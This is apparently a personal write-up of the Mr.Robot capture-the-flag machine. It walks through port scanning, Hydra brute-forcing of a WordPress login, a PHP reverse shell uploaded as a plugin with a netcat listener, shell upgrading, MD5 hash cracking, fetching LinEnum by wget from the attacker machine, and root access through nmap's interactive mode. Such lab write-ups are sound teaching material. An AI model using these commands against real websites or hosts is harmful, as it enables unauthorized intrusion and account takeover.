Mr.Robot CTF
Hello there !
This is my writeup for the famous Mr.Robot CTF virtual machine. I used the platform TryHackMe but you can find this VM on Vulnhub. The goal is to find 3 hidden flags.
When starting to attack a new machine I always add the IP of the VM to my /etc/hosts file to avoid dealing with adresses. So for the rest of this writeup, the domain name of the VM will be mrrobot.thm.
Information gathering
First thing first, let’s scan the machine with nmap to see its open ports :1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19~/tryhackme/mrrobot # nmap -sC -sV -oA mrrobot mrrobot.thm root@kali
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-19 17:09 CEST
Nmap scan report for mrrobot.thm (10.0.0.36)
Host is up (0.023s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/ssl Apache httpd (SSL-only mode)
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.91 seconds
We see that there is a webserver running. So while we explore it, let’s run a gobuster scan to find hidden files and directories.
1 | ~/tryhackme/mrrobot # gobuster -u http://mrrobot.thm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.txt root@kali |
The website is a fun interactive page where you can watch some videos from the show by typing commands but there is not much information we can use. Let’s see the result of the gobuster command :
1 | ~/tryhackme/mrrobot # cat gobuster.txt root@kali |
We notice that this is probably a wordpress blog and that we have a few accesible pages, let’s check them out.
License and readme do not help us very much but here is robots :
We have our first flag ! there is also a fscocity.dic that we can grab. After curling both files, fsociety.dic seems to be a wordlist that we will probably use later.
Getting a reverse shell
Now let’s go to the wp-login page :
When we try a dummy username/password, Worpdress tells us that the username does not exist.
So i figured I would try to bruteforce the username and then the password with the wordlist we got earlier. Let’s look at burp to see the POST parameter used :
Let’s fire up hydra (note that it is important to pass all the parameters to hydra otherwise it won’t work) :1
2
3
4
5
6
7~/tryhackme/mrrobot # hydra -L fsocity.dic -p test mrrobot.thm http-post-form "/wp-login/:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fmrrobot.thm%2Fwp-admin%2F&testcookie=1:F=Invalid username"
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-05-19 17:53:18
[DATA] max 16 tasks per 1 server, overall 16 tasks, 858235 login tries (l:858235/p:1), ~53640 tries per task
[DATA] attacking http-post-form://mrrobot.thm:80/wp-login/:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fmrrobot.thm%2Fwp-admin%2F&testcookie=1:F=Invalid username
[80][http-post-form] host: mrrobot.thm login: Elliot password: test
Bingo, our username is Elliot. Now let’s try to get the password :
1 | ~/tryhackme/mrrobot # hydra -l Elliot -P fsocity.dic mrrobot.thm http-post-form "/wp-login/:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fmrrobot.thm%2Fwp-admin%2F&testcookie=1:S=302" |
Now we also have the password ER28-0652.
After login, this is what we get :
Browsing the panel, we notice that we can upload new plugins. Let’s try to get a reverse shell that way.
If you use kali you can find a php reverse shell here : /usr/share/webshells/php/php-reverse-shell.php.
For Worpdress to understand that this file is a plugin we have to edit it a bit by adding some information in a comment block :
1 |
|
After changing the ip and port, let’s zip the file and upload it as a new plugin :
Now, before activating it we need to open a netcat session on our local machine on the port configured in the script :
1 | ~/tryhackme/mrrobot # nc -lvp 4444 root@kali |
Then we activate the plugin :1
2
3
4
5
6
7
8
9
10
11
12~/tryhackme/mrrobot # nc -lvp 4444 root@kali
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.0.0.36.
Ncat: Connection from 10.0.0.36:47047.
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
16:34:06 up 1:29, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$
We got our shell ! Although at the moment it is not very usable (no arrow keys or autocompletion).
To upgrade it, I followed this 🔥 article.
So first let’s get a pty shell :
1 | $ python -c 'import pty; pty.spawn("/bin/bash")' |
Then let’s suspend the netcat session and use stty + fg to get it back with everything working :1
2
3
4~/tryhackme/mrrobot # stty raw -echo; fg root@kali
[1] + 4804 continued nc -lvp 4444
daemon@linux:/$
We see that we are logged in as the daemon user, let’s go to /home and see if we can find something :1
2
3
4
5
6
7
8
9daemon@linux:/$ cd home/
daemon@linux:/home$ ls
robot
daemon@linux:/home$ cd robot/
daemon@linux:/home/robot$ ls
key-2-of-3.txt password.raw-md5
daemon@linux:/home/robot$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
daemon@linux:/home/robot$
The 2nd flag is here but we don’t have the permission to read it, however we have what seems to be the hash of the user robot (who has the rights to read the flag file). So on our loacl machine let’s try to crack it with hashcat :
1 | ~/tryhackme/mrrobot # hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt root@kali |
Found it ! Let’s log in as robot and grab the flag :1
2
3
4
5
6daemon@linux:/home/robot$ su -l robot
Password:
$ ls
key-2-of-3.txt password.raw-md5
$ whoami
robot
Getting root
Ok now onto the last flag. We need to find a way to get root to get it. So let’s enumarate the box with the help of LinEnum.
First we need to upload it to the box, for this let’s use python SimpleHttpServer.
On the local machine :1
2
3
4
5
6
7
8
9
10
11
12~/tryhackme/mrrobot # cd /opt/LinEnum root@kali
------------------------------------------------------------
/opt/LinEnum(master) # ll root@kali
total 68K
-rw-r--r-- 1 root root 4,2K mai 3 19:26 CHANGELOG.md
-rw-r--r-- 1 root root 615 mai 3 19:26 CONTRIBUTORS.md
-rw-r--r-- 1 root root 1,1K mai 3 19:26 LICENSE
-rwxr-xr-x 1 root root 45K mai 3 19:26 LinEnum.sh
-rw-r--r-- 1 root root 3,8K mai 3 19:26 README.md
------------------------------------------------------------
/opt/LinEnum(master) # python -m SimpleHTTPServer root@kali
Serving HTTP on 0.0.0.0 port 8000 ...
And on the box :1
2
3
4
5
6
7
8
9
10
11$ cd /tmp/
$ wget 10.8.3.22:8000/LinEnum.sh
--2019-05-19 17:01:20-- http://10.8.3.22:8000/LinEnum.sh
Connecting to 10.8.3.22:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 45639 (45K) [text/x-sh]
Saving to: ‘LinEnum.sh’
100%[======================================>] 45,639 --.-K/s in 0.05s
2019-05-19 17:01:20 (968 KB/s) - ‘LinEnum.sh’ saved [45639/45639]
I won’t paste the output of the script here because it’s quite long, but thanks to it we notice some interesting SUID binaries :
1 | [-] SUID files: |
We see that nmap is ran as root, and I remembered that it is possible to run script with it so I tried to give it a go. I grabbed an nmap shell script from google and uploaded it to the box using the same method.
But when I tried to run it :1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27$ nmap -sS -P0 -p 80 --script suid-shell.nse localhost
nmap: unrecognized option '--script'
Nmap 3.81 Usage: nmap [Scan Type(s)] [Options] <host or net list>
Some Common Scan Types ('*' options require root privileges)
* -sS TCP SYN stealth port scan (default if privileged (root))
-sT TCP connect() port scan (default for unprivileged users)
* -sU UDP port scan
-sP ping scan (Find any reachable machines)
* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
-sV Version scan probes open ports determining service & app names/versions
-sR RPC scan (use with other scan types)
Some Common Options (none are required, most can be combined):
* -O Use TCP/IP fingerprinting to guess remote operating system
-p <range> ports to scan. Example range: 1-1024,1080,6666,31337
-F Only scans ports listed in nmap-services
-v Verbose. Its use is recommended. Use twice for greater effect.
-P0 Don't ping hosts (needed to scan www.microsoft.com and others)
* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
-6 scans via IPv6 rather than IPv4
-T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insane> General timing policy
-n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]
-oN/-oX/-oG <logfile> Output normal/XML/grepable scan logs to <logfile>
-iL <inputfile> Get targets from file; Use '-' for stdin
* -S <your_IP>/-e <devicename> Specify source address or network interface
--interactive Go into interactive mode (then press h for help)
Example: nmap -v -sS -O www.my.com 192.168.0.0/16 '192.88-90.*.*'
SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES
It did not work. After some digging I realised that the version of nmap installed was too old to run scripts. So i got back on google and did some research to see if there was another way I could get nmap to run something for me.
And after 5mn I found that nmap used to have an interactive mode from where you could spawn shells. Lucky for me, the version of nmap installed on the box is compatible :
1 | $ nmap --interactive |
We got root ! Now we just need to get the last 🔑 :
1 | # cd /root |
Another one !